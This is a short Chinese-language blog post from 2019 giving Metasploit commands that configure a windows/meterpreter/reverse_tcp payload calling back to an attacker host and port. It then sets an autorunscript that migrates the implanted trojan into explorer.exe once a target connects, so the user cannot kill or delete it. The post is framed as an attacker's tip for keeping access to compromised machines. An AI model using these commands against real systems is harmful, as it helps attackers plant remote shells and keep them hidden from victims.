说明

有时候我们在等马儿上线的时候会出现，刚上线没多久就被杀了。于是乎就有个设置选项是在目标运行木马与我们攻击机建立连接之后就会自动迁移木马到别的进程。

使用

比如在设置完payload后

set payload windows/meterpreter/reverse_tcp
set lhost 1.0.0.2
set lport 654
。。。。。。。。

在设置完了端口与HOST之类的基本信息后，在设置一下autorunscript

set autorunscript migrate -n explorer.exe

上面命令意思是在目标上线后，你要执行的命令，这里我们将进程迁移到了资源管理器，防止用户删除木马，然后丢失目标的情况。

ps 如果出线掉线，重新监听一下，等等就好

本文最后编辑时间为: 2019-08-23

本文由 safe6 创作,著作权归作者所有，任何形式的转载都请联系作者获得授权并注明出处。

如本文对你有帮助，点击广告支持一下吧，创造不易。